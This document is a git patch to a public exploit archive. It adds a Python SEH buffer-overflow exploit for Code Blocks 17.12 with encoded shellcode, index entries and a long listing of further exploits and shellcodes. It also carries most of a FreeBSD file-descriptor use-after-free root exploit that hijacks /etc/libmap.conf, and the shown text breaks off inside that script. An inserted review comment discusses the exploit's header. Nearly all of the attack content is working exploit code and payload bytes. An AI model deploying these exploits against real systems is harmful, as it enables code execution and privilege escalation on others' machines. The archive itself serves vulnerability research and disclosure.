@@ -0,0 +1,108 @@ +# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) +# Vendor Homepage: http://www.codeblocks.org/ +# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-16 +# Vulnerable Software: Code Blocks +# Version: 17.12 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: codeblocks.py +# 2.- Copy content to clipboard +# 3.- Turn off DEP for codeblocks.exe +# 4.- Open "codeblocks.exe" +# 5.- Go to "File" > "New" > "Project..." +# 6.- Click on "Files" from left box > Select "C/C++ header" > Clickon "Go" > Click on "Next" +# 7.- Paste ClipBoard into the "Filename with fullpath:" . +# 8.- Click on "Finish". +# 9.- Calc.exe runs. + + +################################################################################################################################################# + +#Python "codeblocks.py" Code: + +f= open("codeblocks.txt", "w") + +junk1="A" * 2006 + + +nseh="\x61\x62" #popad / align + + +#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe +seh="\xe0\x50" + +ven = "\x62" #align +ven +="\x53" #push ebx +ven += "\x62" #align +ven += "\x58" #pop eax +ven += "\x62" #align +ven += "\x05\x14\x11" #add eax, 0x11001400 +ven += "\x62" #align +ven += "\x2d\x13\x11" #sub eax, 0x11001300 +ven += "\x62" #align + +ven += "\x50" #push eax +ven += "\x62" #align +ven += "\xc3" #ret + +junk2="\x41" * 108 #required to make sure shellcode = eax + +#msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX +buf = "" +buf += 
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72" +buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50" +buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b" +buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52" +buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31" +buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c" +buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37" +buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a" +buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71" +buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34" +buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79" +buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52" +buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71" +buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30" +buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d" +buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c" +buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b" +buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b" +buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34" +buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32" +buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b" +buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64" +buf += 
"\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30" +buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66" +buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78" +buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d" +buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70" +buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52" +buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43" +buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53" +buf += "\x35\x6d\x30\x41\x41" + + + + +junk3 = "\x62" * 5000 #padding to crash + + + +payload = junk1 + nseh + seh + ven + junk2 + buf +junk3 + +f.write(payload) +f.close \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index cc0ec866d..f01140a68 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11095,6 +11095,7 @@ id,file,description,date,author,type,platform,port 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows, 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows, 48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows, +48594,exploits/windows/local/48594.py,"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)",2020-06-17,"Paras Bhatia",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
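Review bot: The header comment of 48594.py does not state the preconditions that decide how serious this entry is. Step 3 requires DEP to be turned off for `codeblocks.exe`, and the trigger is text pasted by the local user into the "Filename with fullpath:" field. I would add a line such as `# Preconditions: DEP disabled for codeblocks.exe; local user interaction required` near the top, so that triage does not depend on reading the step list. The heading "Steps to Produce the Crash" also disagrees with step 9 and the `msfvenom` comment, which describe command execution rather than a crash; one of the two should be corrected.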
@@ -42811,3 +42812,5 @@ id,file,description,date,author,type,platform,port
 48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple,
 48588,exploits/hardware/webapps/48588.py,"Netgear R7000 Router - Remote Code Execution",2020-06-15,grimm-co,webapps,hardware,
 48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php,
+48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php,
+48595,exploits/multiple/webapps/48595.txt,"OpenCTI 3.3.1 - Directory Traversal",2020-06-17,"Raif Berkay Dincel",webapps,multiple,
From 1979df6cb341650aaf7319d705655436defcce8c Mon Sep 17 00:00:00 2001
From: Offensive Security Date: Fri, 19 Jun 2020 05:02:01 +0000 Subject: [PATCH 17/17] DB: 2020-06-19 51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File 
Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! 
J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes) --- exploits/android/remote/47157.txt | 12 + exploits/freebsd/local/47081.sh | 678 +++++++++++++++++++++++++++ exploits/hardware/remote/47083.py | 51 ++ exploits/ios/local/47409.txt | 18 + exploits/jsp/webapps/47391.go | 71 +++ exploits/linux/dos/44994.html | 30 ++ exploits/linux/remote/48196.txt | 131 ++++++ exploits/linux/webapps/47330.rb | 170 +++++++ exploits/multiple/webapps/47342.html | 233 +++++++++ exploits/multiple/webapps/47449.txt | 204 ++++++++ exploits/php/webapps/47161.php | 109 +++++ exploits/php/webapps/47299.php | 219 +++++++++ exploits/php/webapps/47359.txt | 97 ++++ exploits/php/webapps/47413.py | 167 +++++++ exploits/php/webapps/47443.rb | 238 ++++++++++ exploits/php/webapps/48023.txt | 28 ++ exploits/php/webapps/48058.txt | 39 ++ exploits/php/webapps/48059.txt | 18 + exploits/php/webapps/48061.txt | 14 + exploits/php/webapps/48062.txt | 39 ++ exploits/php/webapps/48065.txt | 19 + exploits/php/webapps/48088.txt | 29 ++ exploits/php/webapps/48093.txt | 31 ++ exploits/php/webapps/48198.txt | 43 ++ exploits/php/webapps/48199.txt | 189 ++++++++ exploits/php/webapps/48200.txt | 319 +++++++++++++ exploits/php/webapps/48213.txt | 23 + exploits/php/webapps/48222.txt | 32 ++ exploits/php/webapps/48230.txt | 191 ++++++++ exploits/php/webapps/48238.txt | 39 ++ exploits/php/webapps/48278.txt | 60 +++ exploits/php/webapps/48307.txt | 30 ++ exploits/php/webapps/48347.txt | 121 +++++ exploits/php/webapps/48349.py | 95 ++++ 
exploits/php/webapps/48374.txt | 49 ++ exploits/php/webapps/48605.txt | 20 + exploits/watchos/dos/47404.pl | 27 ++ exploits/watchos/dos/47406.py | 30 ++ exploits/windows/dos/47393.txt | 35 ++ exploits/windows/dos/47795.py | 26 + exploits/windows/dos/47801.py | 21 + exploits/windows/dos/47849.py | 33 ++ exploits/windows/dos/47872.py | 33 ++ exploits/windows/dos/47963.cpp | 135 ++++++ exploits/windows/local/47411.py | 87 ++++ exploits/windows/local/47476.py | 33 ++ exploits/windows/local/47981.txt | 620 ++++++++++++++++++++++++ exploits/windows/remote/48194.txt | 48 ++ exploits/windows/remote/48195.txt | 48 ++ exploits/xml/local/47526.txt | 38 ++ files_exploits.csv | 52 +- files_shellcodes.csv | 5 +- shellcodes/linux/47481.c | 105 +++++ 53 files changed, 5229 insertions(+), 3 deletions(-) create mode 100644 exploits/android/remote/47157.txt create mode 100755 exploits/freebsd/local/47081.sh create mode 100755 exploits/hardware/remote/47083.py create mode 100644 exploits/ios/local/47409.txt create mode 100755 exploits/jsp/webapps/47391.go create mode 100644 exploits/linux/dos/44994.html create mode 100644 exploits/linux/remote/48196.txt create mode 100755 exploits/linux/webapps/47330.rb create mode 100644 exploits/multiple/webapps/47342.html create mode 100644 exploits/multiple/webapps/47449.txt create mode 100644 exploits/php/webapps/47161.php create mode 100644 exploits/php/webapps/47299.php create mode 100644 exploits/php/webapps/47359.txt create mode 100755 exploits/php/webapps/47413.py create mode 100755 exploits/php/webapps/47443.rb create mode 100644 exploits/php/webapps/48023.txt create mode 100644 exploits/php/webapps/48058.txt create mode 100644 exploits/php/webapps/48059.txt create mode 100644 exploits/php/webapps/48061.txt create mode 100644 exploits/php/webapps/48062.txt create mode 100644 exploits/php/webapps/48065.txt create mode 100644 exploits/php/webapps/48088.txt create mode 100644 exploits/php/webapps/48093.txt create mode 100644 
exploits/php/webapps/48198.txt create mode 100644 exploits/php/webapps/48199.txt create mode 100644 exploits/php/webapps/48200.txt create mode 100644 exploits/php/webapps/48213.txt create mode 100644 exploits/php/webapps/48222.txt create mode 100644 exploits/php/webapps/48230.txt create mode 100644 exploits/php/webapps/48238.txt create mode 100644 exploits/php/webapps/48278.txt create mode 100644 exploits/php/webapps/48307.txt create mode 100644 exploits/php/webapps/48347.txt create mode 100755 exploits/php/webapps/48349.py create mode 100644 exploits/php/webapps/48374.txt create mode 100644 exploits/php/webapps/48605.txt create mode 100755 exploits/watchos/dos/47404.pl create mode 100755 exploits/watchos/dos/47406.py create mode 100644 exploits/windows/dos/47393.txt create mode 100755 exploits/windows/dos/47795.py create mode 100755 exploits/windows/dos/47801.py create mode 100755 exploits/windows/dos/47849.py create mode 100755 exploits/windows/dos/47872.py create mode 100644 exploits/windows/dos/47963.cpp create mode 100755 exploits/windows/local/47411.py create mode 100755 exploits/windows/local/47476.py create mode 100644 exploits/windows/local/47981.txt create mode 100644 exploits/windows/remote/48194.txt create mode 100644 exploits/windows/remote/48195.txt create mode 100644 exploits/xml/local/47526.txt create mode 100644 shellcodes/linux/47481.c diff --git a/exploits/android/remote/47157.txt b/exploits/android/remote/47157.txt new file mode 100644 index 000000000..519c500d7 --- /dev/null +++ b/exploits/android/remote/47157.txt 
@@ -0,0 +1,12 @@
+# Exploit Title: Android 7-9 - Remote Code Execution
+# Date: [date]
+# Exploit Author: Marcin Kozlowski
+# Version: 7-9
+# Tested on: Android
+# CVE : 2019-2107
+
+CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns ....
+With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2)
+
+POC:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47157.zip
\ No newline at end of file
diff --git a/exploits/freebsd/local/47081.sh b/exploits/freebsd/local/47081.sh
new file mode 100755
index 000000000..e9aaa1d88
--- /dev/null
+++ b/exploits/freebsd/local/47081.sh
@@ -0,0 +1,678 @@ +#!/bin/sh + +# Exploit script for FreeBSD-SA-19:02.fd +# +# Author: Karsten König of Secfault Security +# Contact: karsten@secfault-security.com +# Twitter: @gr4yf0x +# Kudos: Maik, greg and Dirk for discussion and inspiration +# +# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper + +echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security" + +umask 0000 + +if [ ! -f /etc/libmap.conf ]; then + echo "[!] libmap.conf has to exist" + exit +fi + +cp /etc/libmap.conf ./ + +cat > heavy_cyber_weapon.c << EOF +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define N_FDS 0xfe +#define N_OPEN 0x2 + +#define N 1000000 +#define NUM_THREADS 400 +#define NUM_FORKS 3 +#define FILE_SIZE 1024 +#define CHUNK_SIZE 1 +#define N_FILES 25 + +#define SERVER_PATH "/tmp/sync_forks" +#define DEFAULT_PATH "/tmp/pwn" +#define HAMMER_PATH "/tmp/pwn2" +#define ATTACK_PATH "/etc/libmap.conf" + +#define HOOK_LIB "libutil.so.9" +#define ATTACK_LIB "/tmp/libno_ex.so.1.0" + +#define CORE_0 0 +#define CORE_1 1 + +#define MAX_TRIES 500 + +struct thread_data { + int fd; + int fd2; +}; + +pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx; +pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond; + +int send_recv(int fd, int sv[2], int n_fds) { + int ret, i; + struct iovec iov; + struct msghdr msg; + struct cmsghdr *cmh; + char cmsg[CMSG_SPACE(sizeof(int)*n_fds)]; + int *fds; char buf[1]; + + iov.iov_base = "a"; + iov.iov_len = 1; + + msg.msg_name = NULL; + msg.msg_namelen = 0; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cmsg; + msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds); + msg.msg_flags = 0; + + cmh = CMSG_FIRSTHDR(&msg); + cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds); + cmh->cmsg_level = SOL_SOCKET; + cmh->cmsg_type = SCM_RIGHTS; + fds = (int *)CMSG_DATA(cmsg); + for (i = 0; i < n_fds; 
i++) { + fds[i] = fd; + } + + ret = sendmsg(sv[0], &msg, 0); + if (ret == -1) { + return 1; + } + + iov.iov_base = buf; + msg.msg_name = NULL; + msg.msg_namelen = 0; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cmh; + msg.msg_controllen = CMSG_SPACE(0); + msg.msg_flags = 0; + + ret = recvmsg(sv[1], &msg, 0); + if (ret == -1) { + return 1; + } + + return 0; +} + +int open_tmp(char *path) +{ + int fd; + char *real_path; + + if (path != NULL) { + real_path = malloc(strlen(path) + 1); + strcpy(real_path, path); + } + else { + real_path = malloc(strlen(DEFAULT_PATH) + 1); + strcpy(real_path, DEFAULT_PATH); + } + + if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) { + perror("[!] open"); + exit(1); + } + + fchmod(fd, 0700); + + return fd; +} + +void prepare_domain_socket(struct sockaddr_un *remote, char *path) { + bzero(remote, sizeof(struct sockaddr_un)); + remote->sun_family = AF_UNIX; + strncpy(remote->sun_path, path, sizeof(remote->sun_path)); +} + +int bind_domain_socket(struct sockaddr_un *remote) { + int server_socket; + + if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) { + perror("[!] socket"); + exit(1); + } + + if (bind(server_socket, + (struct sockaddr *) remote, + sizeof(struct sockaddr_un)) != 0) { + perror("[!] bind"); + exit(1); + } + + return server_socket; +} + +int connect_domain_socket_client() { + int client_socket; + + if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) { + perror("[!] 
socket"); + exit(1); + } + + return client_socket; +} + +// Prevent panic at termination because f_count of the +// corrupted struct file is 0 at the moment this function +// is used but fd2 still points to the struct, hence fdrop() +// is called at exit and will panic because f_count will +// be below 0 +// +// So we just use our known primitive to increase f_count +void prevent_panic(int sv[2], int fd) +{ + send_recv(fd, sv, 0xfe); +} + +int stick_thread_to_core(int core) { + /* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */ + /* if (core_id < 0 || core_id >= num_cores) */ + /* return EINVAL; */ + cpuset_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(core, &cpuset); + + pthread_t current_thread = pthread_self(); + return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset); +} + +void *trigger_uaf(void *thread_args) { + struct thread_data *thread_data; + int fd, fd2; + + if (stick_thread_to_core(CORE_0) != 0) { + perror("[!] [!] trigger_uaf: Could not stick thread to core"); + } + + thread_data = (struct thread_data *)thread_args; + fd = thread_data->fd; + fd2 = thread_data->fd2; + + printf("[+] trigger_uaf: fd: %d\n", fd); + printf("[+] trigger_uaf: fd2: %d\n", fd2); + + printf("[+] trigger_uaf: Waiting for start signal from monitor\n"); + pthread_mutex_lock(&trigger_mtx); + pthread_cond_wait(&trigger_cond, &trigger_mtx); + + usleep(40); + + // Close to fds to trigger uaf + // + // This assumes that fget_write() in kern_writev() + // was already successful! 
+ // + // Otherwise kernel panic is triggered + // + // refcount = 2 (primitive+fget_write) + close(fd); + close(fd2); + // refcount = 0 => free + fd = open(ATTACK_PATH, O_RDONLY); + // refcount = 1 + + printf("[+] trigger_uaf: Opened read-only file, now hope\n"); + printf("[+] trigger_uaf: Exit\n"); + + pthread_exit(NULL); +} + +void *hammer(void *arg) { + int i, j, k, client_socket, ret; + char buf[FILE_SIZE], sync_buf[3]; + FILE *fd[N_FILES]; + struct sockaddr_un remote; + + prepare_domain_socket(&remote, SERVER_PATH); + client_socket = connect_domain_socket_client(); + strncpy(sync_buf, "1\n", 3); + + for (i = 0; i < N_FILES; i++) { + unlink(HAMMER_PATH); + if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) { + perror("[!] fopen"); + exit(1); + } + } + + for (i = 0; i < FILE_SIZE; i++) { + buf[i] = 'a'; + } + + pthread_mutex_lock(&hammer_mtx); + + // Sometimes sendto() fails because + // no free buffer is available + for (;;) { + if (sendto(client_socket, + sync_buf, + strlen(sync_buf), 0, + (struct sockaddr *) &remote, + sizeof(remote)) != -1) { + break; + } + } + + pthread_cond_wait(&hammer_cond, &hammer_mtx); + pthread_mutex_unlock(&hammer_mtx); + + for (i = 0; i < N; i++) { + for (k = 0; k < N_FILES; k++) { + rewind(fd[k]); + } + for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) { + for (k = 0; k < N_FILES; k++) { + if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) { + perror("[!] fwrite"); + exit(1); + } + } + fflush(NULL); + } + } + + pthread_exit(NULL); +} + +// Works on UFS only +void *monitor_dirty_buffers(void *arg) { + int hidirtybuffers, numdirtybuffers; + size_t len; + + len = sizeof(int); + + if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) { + perror("[!] 
sysctlbyname hidirtybuffers"); + exit(1); + }; + printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers); + + while(1) { + sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0); + if (numdirtybuffers >= hidirtybuffers) { + pthread_cond_signal(&write_cond); + pthread_cond_signal(&trigger_cond); + printf("[+] monitor: Reached hidirtybuffers watermark\n"); + break; + } + } + + pthread_exit(NULL); +} + +int check_write(int fd) { + char buf[256]; + int nbytes; + struct stat st; + + printf("[+] check_write\n"); + stat(DEFAULT_PATH, &st); + printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size); + + stat(ATTACK_PATH, &st); + printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size); + + nbytes = read(fd, buf, strlen(HOOK_LIB)); + printf("[+] Read bytes: %d\n", nbytes); + if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) { + return 1; + } + else if (nbytes < 0) { + perror("[!] check_write:read"); + printf("[!] check_write:Cannot check if it worked!"); + return 1; + } + + return 0; +} + +void *write_to_file(void *thread_args) { + int fd, fd2, nbytes; + int *fd_ptr; + char buf[256]; + struct thread_data *thread_data; + + if (stick_thread_to_core(CORE_1) != 0) { + perror("[!] 
write_to_file: Could not stick thread to core"); + } + + fd_ptr = (int *) malloc(sizeof(int)); + + thread_data = (struct thread_data *)thread_args; + fd = thread_data->fd; + fd2 = open(ATTACK_PATH, O_RDONLY); + + printf("[+] write_to_file: Wait for signal from monitor\n"); + pthread_mutex_lock(&write_mtx); + pthread_cond_wait(&write_cond, &write_mtx); + + snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB); + nbytes = write(fd, buf, strlen(buf)); + + // Reopen directly after write to prevent panic later + // + // After the write f_count == 0 because after trigger_uaf() + // opened the read-only file, f_count == 1 and write() + // calls fdrop() at the end + // + // => f_count == 0 + // + // A direct open hopefully assigns the now again free file + // object to fd so that we can prevent the panic with our + // increment primitive. + if ((fd = open_tmp(NULL)) == -1) + perror("[!] write_to_file: open_tmp"); + *fd_ptr = fd; + + if (nbytes < 0) { + perror("[!] [!] write_to_file:write"); + } else if (nbytes > 0) { + printf("[+] write_to_file: We have written something...\n"); + if (check_write(fd2) > 0) + printf("[+] write_to_file: It (probably) worked!\n"); + else + printf("[!] write_to_file: It worked not :(\n"); + } + + printf("[+] write_to_file: Exit\n"); + pthread_exit(fd_ptr); +} + +void prepare(int sv[2], int fds[2]) { + int fd, fd2, i; + + printf("[+] Start UaF preparation\n"); + printf("[+] This can take a while\n"); + + // Get a single file descriptor to send via the socket + if ((fd = open_tmp(NULL)) == -1) { + perror("[!] open_tmp"); + exit(1); + } + + if ((fd2 = dup(fd)) == -1) { + perror("[!] dup"); + exit(1); + } + + // fp->f_count will increment by 0xfe in one iteration + // doing this 16909320 times will lead to + // f_count = 16909320 * 0xfe + 2 = 0xfffffff2 + // Note the 2 because of the former call of dup() and + // the first open(). 
+ // + // To test our trigger we can send 0xd more fd's what + // would to an f_count of 0 when fdclose() is called in + // m_dispose_extcontrolm. fdrop() will reduce f_count to + // 0xffffffff = -1 and ultimately panic when _fdrop() is + // called because the latter asserts that f_count is 0. + // _fdrop is called in the first place because + // refcount_release() only checks that f_count is less or + // equal 1 to recognize the last reference. + // + // If we want to trigger the free without panic, we have + // to send 0xf fds and close an own what will lead to an + // fdrop() call without panic as f_count is 1 and reduced + // to 0 by close(). The unclosed descriptor references now + // a free 'struct file'. + for (i = 0; i < 16909320; i++) { + if (i % 1690930 == 0) { + printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093)); + } + + if (send_recv(fd, sv, N_FDS)) { + perror("[!] prepare:send_recv"); + exit(1); + } + } + if (send_recv(fd, sv, 0xf)) { + perror("[!] prepare:send_recv"); + exit(1); + } + + fds[0] = fd; + fds[1] = fd2; + + printf("[+] Finished UaF preparation\n"); +} + +void read_thread_status(int server_socket) { + int bytes_rec, count; + struct sockaddr_un client; + socklen_t len; + char buf[256]; + struct timeval tv; + + tv.tv_sec = 10; + tv.tv_usec = 0; + setsockopt(server_socket, + SOL_SOCKET, SO_RCVTIMEO, + (const char*)&tv, sizeof tv); + + for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) { + if (count % 100 == 0) { + printf("[+] Hammer threads ready: %d\n", count); + } + bzero(&client, sizeof(struct sockaddr_un)); + bzero(buf, 256); + + len = sizeof(struct sockaddr_un); + if ((bytes_rec = recvfrom(server_socket, + buf, 256, 0, + (struct sockaddr *) &client, + &len)) == -1) { + perror("[!] recvfrom"); + break; + } + } + + if (count != NUM_FORKS * NUM_THREADS) { + printf("[!] 
